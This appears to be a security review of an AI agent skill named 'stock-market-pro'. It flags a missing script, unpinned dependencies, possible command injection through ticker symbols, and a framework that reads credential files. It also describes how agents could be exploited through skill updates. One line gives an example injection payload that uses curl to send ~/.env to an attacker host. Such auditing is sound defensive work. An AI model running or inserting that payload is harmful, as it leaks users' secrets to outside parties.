Is stock-market-pro safe?

SKILL.md instructs the agent to run uv run --script scripts/yf [command] [args] for all operations, but the scripts/yf file does not exist in the skill repository. This means either the skill is non-functional as distributed, or the script is expected to be generated/fetched at runtime through an unauditable mechanism.

The skill relies on uv run --script which automatically resolves and installs Python dependencies (yfinance, mplfinance, rich) from PyPI at runtime without version pinning or hash verification. A supply-chain compromise of any of these packages would result in arbitrary code execution in the user's environment.

The yfinance library makes HTTP requests to Yahoo Finance APIs. Since the actual Python script is missing from the repository, we cannot verify that only legitimate Yahoo Finance endpoints are contacted. The script could potentially send data to arbitrary endpoints under the cover of 'stock data fetching'.

The skill passes user-provided ticker symbols directly into shell commands (uv run --script scripts/yf price [TICKER]). If the agent constructs these commands by string interpolation without sanitization, a malicious ticker input like ; curl attacker.com/exfil?data=$(cat ~/.env) could achieve command injection. The risk depends on how the agent constructs the command and whether the missing yf script sanitizes inputs.

The skill normalizes the pattern of the agent executing shell commands on the user's behalf for financial data. While not a direct prompt injection, this establishes a precedent where the agent routinely runs uv run commands, which could be exploited by a future malicious skill update that modifies the command targets.

The OpenClaw agent framework reads .env, .aws/credentials, openclaw.json, and auth-profiles.json during skill installation. These reads are attributable to the framework rather than the skill itself, but they demonstrate that sensitive files are accessible in the execution environment.